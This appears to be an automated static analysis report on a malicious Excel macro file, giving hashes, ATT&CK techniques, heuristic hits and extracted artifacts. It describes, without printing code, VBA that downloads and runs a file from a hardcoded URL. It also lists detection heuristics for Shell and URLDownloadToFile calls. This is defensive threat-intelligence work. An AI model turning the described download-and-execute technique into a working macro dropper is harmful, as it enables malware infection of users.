Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 498e6993300b382e…

MALICIOUS

Office (OOXML) / .XLSM

26.1 KB Created: 2022-05-31 09:01:43 UTC Authoring application: 16.0300 First seen: 2022-05-31
MD5: 40e0b62dcb0c547f4b75ad732dfcc8b5 SHA-1: 40ac627a8a24fb615119336a45546e6515df2bab SHA-256: 498e6993300b382e4140d7782a7e8560e996b6c46e5bcc6cb240c74db8e69d7b
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is an XLSM file containing VBA macros. The script utilizes the URLDownloadToFileA function to download a file from a hardcoded URL, which is then executed. The script also attempts to execute 'calc' and 'notepad' via the Shell function, likely as a test or to obfuscate the true payload. The document body contains obfuscated text, which is typical for lures.

Heuristics 4

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
ebaa97748f7d40bc44f150e799c5e975ff2917ebe958ccd48f2aa155dcdcebd4		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1993 bytes
vbaProject_00.bin
279ec93c98754c859d0313e1aa8d2d59a8d411818dbb4dfc504d296350c9f2d5		 vba-project OOXML VBA project: xl/vbaProject.bin 17408 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.